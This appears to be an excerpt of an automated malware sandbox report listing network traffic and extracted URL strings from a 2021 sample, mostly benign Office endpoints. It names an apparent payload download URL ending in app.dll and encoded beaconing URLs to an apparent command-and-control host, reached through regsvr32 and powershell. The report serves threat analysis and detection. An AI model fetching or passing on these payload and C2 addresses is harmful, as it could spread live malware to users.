Source: global traffic	HTTP traffic detected: GET /h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gareL3qIHQG/CB4JNANcQf7aA7/T_2FdtzxTEW5qEGgXi5de/wQDU_2FVQ9AqPhgZ/QBiqWLaZem_2BhU/Ub_2Bbrgr7V1ABDC_2/FRiGY94s4/Mw6BG5UCBUeOPfAvsqhw/LTDXh6l0kPjcKC2fY3f/eXzxQUf3im0jBAcOxzjmlM/t_2BlYZFFpOnU/rPHW4IFe/pXsS9omB7zF_2B_2BEp_2BV/Ya9nAT6p4X/2ixawH6C4M4LLI7hR/_2BGNe0TQDy_/2FBKn745niy/_2BRADxlO6wxP1/zz_2BWqAzRaI/gWg HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive

Source: msapplication.xml0.23.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.23.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.23.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.23.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.23.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.23.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: free.mynowministries.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 08 Jul 2021 13:46:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: powershell.exe, 00000027.00000002.587349219.000002B5AD3CF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: {5DCD6FF8-E03E-11EB-90E4-ECF4BB862DED}.dat.23.dr, ~DF99BD870E81A4914B.TMP.23.dr	String found in binary or memory: http://gtr.antoinfer.com/7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2F
Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp	String found in binary or memory: http://gtr.antoinfer.com/IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/
Source: {7879BAAA-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DF4AB9BBFB5CFFE773.TMP.28.dr	String found in binary or memory: http://gtr.antoinfer.com/IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/7AJjg
Source: {7879BAA8-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr	String found in binary or memory: http://gtr.antoinfer.com/MpeUKSeGn_2/Bk4DEtluQu8Y9R/36MpR_2BhUMN_2FXN2dO6/hANnmINzHP5reb6i/6KJxoqvLx
Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp	String found in binary or memory: http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gare
Source: {7879BAAC-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr	String found in binary or memory: http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gareL3qIH
Source: {7879BAA6-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DFA7B5BF1FB774EA36.TMP.28.dr	String found in binary or memory: http://gtr.antoinfer.com/k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk
Source: {7879BAA4-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DF436C4ACF406520B7.TMP.28.dr	String found in binary or memory: http://gtr.antoinfer.com/xFDxUxdbnv/F6OYsZZ54L9nW_2Fn/67TmggSh_2FJ/XC_2BJ4ptUf/_2Bn4_2BufrBke/X9TaUV
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: powershell.exe, 00000025.00000002.587720869.0000028658461000.00000004.00000001.sdmp, powershell.exe, 00000027.00000002.589665519.000002B5AD541000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: msapplication.xml.23.dr	String found in binary or memory: http://www.amazon.com/
Source: powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msapplication.xml1.23.dr	String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.23.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.23.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.23.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.23.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.23.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.23.dr	String found in binary or memory: http://www.youtube.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://api.aadrm.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://api.cortana.ai
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://api.office.net
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://api.onedrive.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://augloop.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://cdn.entity.
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://clients.config.office.net/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://config.edge.skype.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://cortana.ai
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://cortana.ai/api
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://cr.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://dev.cortana.ai
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://devnull.onenote.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://directory.services.
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: close.xml	String found in binary or memory: https://free.mynowministries.com/app.dll
Source: powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://graph.windows.net
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://graph.windows.net/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://lifecycle.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://login.windows.local
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://management.azure.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://management.azure.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://messaging.office.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://ncus.contentsync.
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://officeapps.live.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://onedrive.live.com
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://osi.office.net
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://outlook.office.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://outlook.office365.com/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
